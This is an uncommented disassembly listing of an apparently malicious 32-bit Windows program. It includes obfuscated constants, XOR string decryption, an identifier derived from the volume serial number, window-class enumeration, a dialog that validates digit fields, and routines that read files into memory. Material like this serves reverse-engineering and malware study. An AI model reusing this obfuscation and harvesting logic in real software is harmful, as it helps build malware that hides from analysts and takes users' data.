pop edi
pop esi
pop ebx
leave
retn
sub_43F63D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F6E3 proc near ; CODE XREF: sub_43DB8B+463�p
; sub_43DB8B+47F�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_442F6C
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call ds:dword_444004 ; GetWindow
mov edi, eax
loc_43F700: ; CODE XREF: sub_43F6E3+7D�j
or edi, edi
jnz short loc_43F708
xor eax, eax
jmp short loc_43F762
; ---------------------------------------------------------------------------
loc_43F708: ; CODE XREF: sub_43F6E3+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call ds:dword_445010 ; GetClassNameA
movsx eax, word_44A144
sub eax, 5
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_4384B5
add esp, 0Ch
movsx esi, word_44A124
movsx ebx, word_44A170
lea esi, [esi+ebx+0FFF7h]
cmp eax, esi
jz short loc_43F755
mov eax, edi
jmp short loc_43F762
; ---------------------------------------------------------------------------
loc_43F755: ; CODE XREF: sub_43F6E3+6C�j
push 2
push edi
call ds:dword_444004 ; GetWindow
mov edi, eax
jmp short loc_43F700
; ---------------------------------------------------------------------------
loc_43F762: ; CODE XREF: sub_43F6E3+23�j
; sub_43F6E3+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_43F6E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F767 proc near ; CODE XREF: sub_43858C+209�p
; sub_43858C+220�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44A290, 0
jnz short loc_43F78F
push offset dword_449BC0
call ds:dword_445008 ; InitializeCriticalSection
mov dword_44A290, 1
loc_43F78F: ; CODE XREF: sub_43F767+11�j
mov esi, dword_44A1D8
sub esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
movsx edx, word_44A0BC
sub edx, 7
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44A0AC
add edx, 5
cmp eax, edx
jz loc_43F852
push offset dword_449BC0
call ds:dword_449660 ; RtlEnterCriticalSection
mov eax, dword_44A110
inc eax
mov [ebp+var_2], ax
jmp short loc_43F80D
; ---------------------------------------------------------------------------
loc_43F7E9: ; CODE XREF: sub_43F767+B0�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, dword_44A09C
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_43F80D: ; CODE XREF: sub_43F767+80�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_43F7E9
mov eax, dword_44A1F8
sub eax, 3
mov edx, dword_44A258
sub edx, 2
mov [edi+eax], dl
mov eax, dword_44A21C
add eax, dword_44A114
sub eax, 0Eh
mov edx, dword_44A128
sub edx, 9
mov [edi+eax], dl
push offset dword_449BC0
call ds:dword_448650 ; RtlLeaveCriticalSection
loc_43F852: ; CODE XREF: sub_43F767+65�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_43F767 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F85A proc near ; CODE XREF: sub_43B982+24�p
; sub_43D8DE+25�p ...
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_446600 ; GetSystemDirectoryA
mov eax, dword_44A14C
movsx edx, word_44A264
sub edx, 9
mov byte ptr [ebp+eax+var_10C+1], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call ds:dword_449614 ; GetVolumeInformationA
push offset dword_44AD90
call sub_43C507
push [ebp+var_10C]
push eax
push edi
call ds:dword_449634
add esp, 10h
mov eax, dword_44A1D0
add eax, dword_44A184
sub eax, 9
mov [ebp+var_4], eax
jmp short loc_43F920
; ---------------------------------------------------------------------------
loc_43F8F1: ; CODE XREF: sub_43F85A+D3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_43F907
cmp al, 39h
jg short loc_43F907
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_43F907: ; CODE XREF: sub_43F85A+9F�j
; sub_43F85A+A3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_43F91D
cmp al, 5Ah
jg short loc_43F91D
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_43F91D: ; CODE XREF: sub_43F85A+B5�j
; sub_43F85A+B9�j
inc [ebp+var_4]
loc_43F920: ; CODE XREF: sub_43F85A+95�j
movsx eax, word_44A1F0
add eax, 5
cmp [ebp+var_4], eax
jb short loc_43F8F1
pop edi
leave
retn
sub_43F85A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F932 proc near ; CODE XREF: sub_43AE20+3C�p
; sub_43AE20+C4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
movsx eax, word_44A0BC
mov edx, dword_44A234
lea eax, [eax+edx+0F3h]
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
movsx eax, word_44A218
add eax, 0FBh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
mov eax, dword_44A280
movsx edx, word_44A1B4
mov esi, eax
add esi, edx
sub esi, 8
jmp short loc_43F9DD
; ---------------------------------------------------------------------------
loc_43F98C: ; CODE XREF: sub_43F932+B5�j
movsx edi, word_44A208
add edi, dword_44A224
sub edi, 7
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_43F9B3
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_43F9B3: ; CODE XREF: sub_43F932+7A�j
mov ecx, off_44A2BC
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov edi, dword_44A17C
add edi, 34h
mov ecx, edi
add ecx, dword_44A0F4
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_43F9DD: ; CODE XREF: sub_43F932+58�j
movsx eax, word_44A208
dec eax
cmp esi, eax
jl short loc_43F98C
pop edi
pop esi
pop ebx
leave
retn
sub_43F932 endp
; =============== S U B R O U T I N E =======================================
sub_43F9EE proc near ; DATA XREF: .data:0044A364�o
mov eax, 80004001h
retn 10h
sub_43F9EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F9F6 proc near ; DATA XREF: sub_43DB8B+F04�o
; sub_43DB8B+F54�o ...
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_219 = byte ptr -219h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_10E = byte ptr -10Eh
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov eax, ebx
cmp eax, 100h
jz short loc_43FA27
jl loc_43FF65
cmp eax, 111h
jz loc_43FAB8
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FA27: ; CODE XREF: sub_43F9F6+19�j
cmp [ebp+arg_8], 9
jnz loc_43FF65
mov edi, dword_44A15C
sub edi, 9
jmp short loc_43FAA7
; ---------------------------------------------------------------------------
loc_43FA3C: ; CODE XREF: sub_43F9F6+BB�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
cmp ds:dword_447380[eax], esi
jnz short loc_43FA71
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_447384[eax]
call ds:dword_446A40 ; SetFocus
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FA71: ; CODE XREF: sub_43F9F6+5A�j
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
cmp ds:dword_447384[eax], esi
jnz short loc_43FAA6
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_447388[eax]
call ds:dword_446A40 ; SetFocus
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FAA6: ; CODE XREF: sub_43F9F6+8F�j
inc edi
loc_43FAA7: ; CODE XREF: sub_43F9F6+44�j
mov eax, dword_44A258
add eax, 62h
cmp edi, eax
jb short loc_43FA3C
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FAB8: ; CODE XREF: sub_43F9F6+26�j
mov eax, dword_44A134
mov edi, eax
add edi, dword_44A224
sub edi, 0Dh
jmp short loc_43FAE4
; ---------------------------------------------------------------------------
loc_43FACA: ; CODE XREF: sub_43F9F6+101�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
mov eax, ds:dword_44738C[eax]
cmp [ebp+arg_C], eax
jz short loc_43FAF9
inc edi
loc_43FAE4: ; CODE XREF: sub_43F9F6+D2�j
movsx eax, word_44A264
mov edx, dword_44A288
lea eax, [eax+edx+55h]
cmp edi, eax
jb short loc_43FACA
loc_43FAF9: ; CODE XREF: sub_43F9F6+EB�j
mov eax, dword_44A258
add eax, 5Eh
movsx edx, word_44A180
add eax, edx
cmp edi, eax
jz loc_43FF65
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_447378[eax]
call ds:dword_449BA4 ; GetWindowTextA
movsx eax, word_44A124
mov byte ptr [ebp+eax+var_20C+2], 4Bh
mov eax, dword_44A0F8
mov edx, dword_44A21C
sub edx, 8
mov byte ptr [ebp+eax+var_20C+2], dl
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_444020
add esp, 8
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_447380[eax]
call ds:dword_449BA4 ; GetWindowTextA
mov eax, dword_44A0F8
add eax, dword_44A268
movsx eax, [ebp+eax+var_10E]
cmp eax, dword_44A248
jnz short loc_43FBF9
push offset byte_44AD6D
call sub_43C507
pop ecx
mov edx, dword_44A18C
add edx, dword_44A09C
sub edx, 5
push edx
push 0
push eax
push 0
call ds:dword_449644 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_447380[eax]
call ds:dword_446A40 ; SetFocus
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FBF9: ; CODE XREF: sub_43F9F6+1BC�j
push offset dword_44AD68
call sub_43C507
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_444020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_444020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_447384[eax]
call ds:dword_449BA4 ; GetWindowTextA
mov eax, dword_44A1AC
movsx eax, [ebp+eax+var_108]
mov edx, dword_44A184
sub edx, 2
cmp eax, edx
jnz short loc_43FCAD
push offset word_44AD46
call sub_43C507
pop ecx
mov edx, dword_44A19C
add edx, dword_44A25C
sub edx, 0Eh
push edx
push 0
push eax
push 0
call ds:dword_449644 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_447384[eax]
call ds:dword_446A40 ; SetFocus
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FCAD: ; CODE XREF: sub_43F9F6+270�j
push offset byte_44AD41
call sub_43C507
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_444020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_444020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_447388[eax]
call ds:dword_449BA4 ; GetWindowTextA
movsx eax, word_44A098
movsx eax, [ebp+eax+var_105]
mov edx, dword_44A18C
add edx, dword_44A268
sub edx, 4
cmp eax, edx
jz loc_43FE4F
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43FD31: ; CODE XREF: sub_43F9F6+340�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FD31
mov ecx, dword_44A120
sub ecx, 1
cmp eax, ecx
jb loc_43FE4F
movsx eax, word_44A150
add eax, dword_44A21C
sub eax, 10h
mov [ebp+var_105], al
jmp short loc_43FD83
; ---------------------------------------------------------------------------
loc_43FD61: ; CODE XREF: sub_43F9F6+3A6�j
movzx eax, [ebp+var_105]
mov al, [ebp+eax+var_103]
cmp al, 30h
jl short loc_43FD77
cmp al, 39h
jle short loc_43FD7C
loc_43FD77: ; CODE XREF: sub_43F9F6+37B�j
jmp loc_43FE4F
; ---------------------------------------------------------------------------
loc_43FD7C: ; CODE XREF: sub_43F9F6+37F�j
add [ebp+var_105], 1
loc_43FD83: ; CODE XREF: sub_43F9F6+369�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43FD8C: ; CODE XREF: sub_43F9F6+39B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FD8C
movzx ecx, [ebp+var_105]
cmp ecx, eax
jb short loc_43FD61
mov eax, dword_44A280
add eax, dword_44A0D4
sub eax, 0Ah
mov [ebp+var_104], al
jmp short loc_43FE2B
; ---------------------------------------------------------------------------
loc_43FDB4: ; CODE XREF: sub_43F9F6+44E�j
mov al, [ebp+var_104]
mov [ebp+var_219], al
jmp short loc_43FDEB
; ---------------------------------------------------------------------------
loc_43FDC2: ; CODE XREF: sub_43F9F6+40E�j
movzx eax, [ebp+var_219]
movsx eax, [ebp+eax+var_103]
movzx edx, [ebp+var_104]
movsx edx, [ebp+edx+var_103]
cmp eax, edx
jnz short loc_43FE06
add [ebp+var_219], 1
loc_43FDEB: ; CODE XREF: sub_43F9F6+3CA�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43FDF4: ; CODE XREF: sub_43F9F6+403�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FDF4
movzx ecx, [ebp+var_219]
cmp ecx, eax
jb short loc_43FDC2
loc_43FE06: ; CODE XREF: sub_43F9F6+3EC�j
movzx eax, [ebp+var_219]
movzx edx, [ebp+var_104]
sub eax, edx
movsx edx, word_44A0BC
sub edx, 6
cmp eax, edx
jg short loc_43FE4F
add [ebp+var_104], 1
loc_43FE2B: ; CODE XREF: sub_43F9F6+3BC�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_43FE34: ; CODE XREF: sub_43F9F6+443�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43FE34
movzx ecx, [ebp+var_104]
cmp ecx, eax
jb loc_43FDB4
jmp loc_43FEDE
; ---------------------------------------------------------------------------
loc_43FE4F: ; CODE XREF: sub_43F9F6+32C�j
; sub_43F9F6+34D�j ...
mov eax, dword_44A1C4
add eax, 7CBh
push eax
call ds:dword_449630
push offset a5_0 ; "5"
call sub_43C507
mov [ebp-21Ch], eax
push offset byte_44ACF1
call sub_43C507
movsx edx, word_44A174
sub edx, 7
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call ds:dword_449644 ; MessageBoxA
push offset byte_44ACED
call sub_43C507
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp+var_220], eax
mov edx, eax
push ds:dword_447388[edx]
call ds:dword_449658 ; SetWindowTextA
mov eax, 30h
mul edi
mov [ebp+var_224], eax
push ds:dword_447388[eax]
call ds:dword_446A40 ; SetFocus
jmp loc_43FF65
; ---------------------------------------------------------------------------
loc_43FEDE: ; CODE XREF: sub_43F9F6+454�j
push offset dword_44ACE8
call sub_43C507
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_444020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_444020
mov eax, 30h
mul edi
mov [ebp+var_228], eax
push ds:dword_447378[eax]
call ds:dword_447224 ; DestroyWindow
lea eax, [ebp+var_204]
push eax
call ds:dword_44404C
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp+var_22C], eax
push ds:dword_447374[eax]
call ds:dword_44965C ; ShowWindow
mov eax, 30h
mul edi
mov [ebp+var_230], eax
and ds:dword_447370[eax], 0
loc_43FF65: ; CODE XREF: sub_43F9F6+1B�j
; sub_43F9F6+2C�j ...
mov eax, dword_44A0C8
movsx edx, word_44A1B4
mov edi, eax
add edi, edx
sub edi, 4
jmp loc_440051
; ---------------------------------------------------------------------------
loc_43FF7D: ; CODE XREF: sub_43F9F6+667�j
mov eax, 30h
mul edi
mov [ebp+var_8], eax
cmp esi, ds:dword_447380[eax]
jnz short loc_43FFB4
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_C], eax
push ds:dword_447390[eax]
call ds:dword_44960C ; CallWindowProcA
jmp loc_440063
; ---------------------------------------------------------------------------
loc_43FFB4: ; CODE XREF: sub_43F9F6+598�j
mov eax, 30h
mul edi
mov [ebp+var_10], eax
cmp esi, ds:dword_447384[eax]
jnz short loc_43FFE8
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_14], eax
push ds:dword_447394[eax]
call ds:dword_44960C ; CallWindowProcA
jmp short loc_440063
; ---------------------------------------------------------------------------
loc_43FFE8: ; CODE XREF: sub_43F9F6+5CF�j
mov eax, 30h
mul edi
mov [ebp+var_18], eax
cmp esi, ds:dword_447388[eax]
jnz short loc_44001C
push [ebp+arg_C]
loc_43FFFE: ; DATA XREF: .data:off_44B279�o
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_1C], eax
push ds:dword_447398[eax]
call ds:dword_44960C ; CallWindowProcA
jmp short loc_440063
; ---------------------------------------------------------------------------
loc_44001C: ; CODE XREF: sub_43F9F6+603�j
mov eax, 30h
mul edi
mov [ebp+var_20], eax
cmp esi, ds:dword_44737C[eax]
jnz short loc_440050
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_24], eax
push ds:dword_44739C[eax]
call ds:dword_44960C ; CallWindowProcA
jmp short loc_440063
; ---------------------------------------------------------------------------
loc_440050: ; CODE XREF: sub_43F9F6+637�j
inc edi
loc_440051: ; CODE XREF: sub_43F9F6+582�j
movsx eax, word_44A0D8
add eax, 62h
cmp edi, eax
jb loc_43FF7D
loc_440063: ; CODE XREF: sub_43F9F6+5B9�j
; sub_43F9F6+5F0�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_43F9F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44006A proc near ; CODE XREF: sub_43A974+247�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_43C5EA
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_44028F
mov [ebp+var_18], 8
push offset dword_44ACD8
call sub_43F767
pop ecx
push eax
call ds:dword_444044
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44A1A4
sub eax, 7
cmp ebx, eax
jnz loc_440277
lea eax, [ebp+var_3C]
push eax
push offset dword_44BA68
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A280
add eax, dword_44A20C
sub eax, 0Ah
cmp ebx, eax
jnz loc_44026E
mov [ebp+var_30], 2
mov eax, dword_44A164
sub eax, 4
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44A288
add eax, dword_44A184
sub eax, 8
cmp ebx, eax
jnz loc_440265
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset dword_44BA78
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44A160
dec eax
cmp ebx, eax
jnz loc_44025C
inc ds:dword_446620
movsx eax, word_44A104
add eax, 2
cmp ds:dword_446620, eax
jb short loc_4401B7
mov eax, dword_44A0F4
add eax, 3
mov ds:dword_446620, eax
push [ebp+var_4]
call sub_43B523
pop ecx
jmp loc_440253
; ---------------------------------------------------------------------------
loc_4401B7: ; CODE XREF: sub_44006A+130�j
mov eax, dword_44A0AC
movsx edx, word_44A0D8
add eax, edx
sub eax, 3
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push ds:dword_448640
call sub_44047F
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push ds:dword_444018
call sub_44047F
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_440213
cmp [ebp+var_34], 0
jz short loc_440213
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_43B622
add esp, 10h
loc_440213: ; CODE XREF: sub_44006A+18C�j
; sub_44006A+192�j
cmp [ebp+var_40], 0
jz short loc_440234
cmp [ebp+var_38], 0
jz short loc_440234
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_43B622
add esp, 10h
loc_440234: ; CODE XREF: sub_44006A+1AD�j
; sub_44006A+1B3�j
push [ebp+var_34]
call ds:dword_44661C ; LocalFree
push [ebp+var_38]
call ds:dword_44661C ; LocalFree
push 0
push [ebp+arg_4]
call sub_43C5EA
add esp, 8
loc_440253: ; CODE XREF: sub_44006A+148�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44025C: ; CODE XREF: sub_44006A+114�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_440265: ; CODE XREF: sub_44006A+E8�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44026E: ; CODE XREF: sub_44006A+94�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_440277: ; CODE XREF: sub_44006A+66�j
lea eax, [ebp+var_18]
push eax
call ds:dword_449BA0
movsx eax, word_44A1E0
sub eax, 3
cmp ebx, eax
jz short $+2
loc_44028F: ; CODE XREF: sub_44006A+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_44006A endp
; =============== S U B R O U T I N E =======================================
sub_440294 proc near ; DATA XREF: .data:0044A368�o
mov eax, 80004001h
retn 18h
sub_440294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44029C proc near ; CODE XREF: sub_43BD90+2CE�p
; sub_43D357+263�p
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
push edi
push [ebp+arg_4]
call ds:dword_449630
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_442F8C
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_4402CA: ; CODE XREF: sub_44029C+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4402CA
mov edx, dword_44A1C4
add edx, dword_44A14C
sub edx, 0Ah
mov ebx, eax
sub ebx, edx
mov edx, dword_44A254
sub edx, 9
mov [ebp+ebx+var_316], dl
mov eax, dword_44A268
movsx edx, word_44A0A4
mov edi, eax
add edi, edx
sub edi, 0Ah
loc_440307: ; CODE XREF: sub_44029C+177�j
mov eax, edi
movsx ecx, word_44A240
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word_44A1F0
dec ecx
mul ecx
mov [ebp+var_324], eax
mov eax, dword_44A1F4
movsx edx, word_44A0CC
add eax, edx
sub eax, 0Ah
mov edx, [ebp+var_324]
add edx, eax
mov eax, dword_44A21C
sub eax, 8
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, dword_44A114
sub edx, 8
cmp eax, edx
jnz loc_440412
mov eax, edi
mov ecx, dword_44A270
sub ecx, 2
mul ecx
mov [ebp+var_328], eax
mov eax, dword_44A0F8
add eax, dword_44A0EC
sub eax, 9
mov edx, [ebp+var_328]
add edx, eax
movsx eax, word_44A16C
add eax, dword_44A164
sub eax, 5
mov [ebp+edx+var_212], al
mov eax, dword_44A14C
mov [ebp+var_32C], eax
mov eax, edi
mov edx, [ebp+var_32C]
mov ecx, edx
add ecx, dword_44A204
sub ecx, 5
mul ecx
mov [ebp+var_330], eax
mov eax, dword_44A14C
sub eax, 3
mov edx, [ebp+var_330]
add edx, eax
movsx eax, word_44A0B0
movsx ecx, word_44A124
add eax, ecx
sub eax, 0Dh
mov [ebp+edx+var_212], al
jmp short loc_440418
; ---------------------------------------------------------------------------
loc_440412: ; CODE XREF: sub_44029C+DE�j
inc edi
jmp loc_440307
; ---------------------------------------------------------------------------
loc_440418: ; CODE XREF: sub_44029C+174�j
cmp dword_44A2AC, 0
jz short loc_440459
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_446604
mov esi, eax
or esi, esi
jz short loc_440459
cmp dword_44A2B0, 0
jz short loc_44047A
mov eax, dword_44A13C
sub eax, 2
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_44401C
loc_440459: ; CODE XREF: sub_44029C+183�j
; sub_44029C+198�j
push ds:dword_446614
push ds:off_449610
lea eax, [ebp+var_316]
push eax
call sub_440F46
add esp, 0Ch
mov [ebp+var_31C], eax
loc_44047A: ; CODE XREF: sub_44029C+1A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_44029C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44047F proc near ; CODE XREF: sub_43D9B8+18�p
; sub_44006A+16B�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call ds:dword_449788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4404C8
cmp [ebp+arg_4], 0
jz short loc_4404C4
mov eax, [ebp+arg_4]
movsx edx, word_44A0BC
add edx, dword_44A1AC
sub edx, 0Eh
mov [eax], edx
loc_4404C4: ; CODE XREF: sub_44047F+2E�j
xor eax, eax
jmp short loc_44050C
; ---------------------------------------------------------------------------
loc_4404C8: ; CODE XREF: sub_44047F+28�j
push 0
push edi
call ds:dword_449624 ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call ds:dword_446A34 ; LocalAlloc
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_4404F1
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_4404F7
; ---------------------------------------------------------------------------
loc_4404F1: ; CODE XREF: sub_44047F+68�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_4404F7: ; CODE XREF: sub_44047F+70�j
push [ebp+var_8]
push esi
push ebx
push edi
call ds:dword_444028 ; ReadFile
push edi
call ds:dword_448654 ; CloseHandle
mov eax, ebx
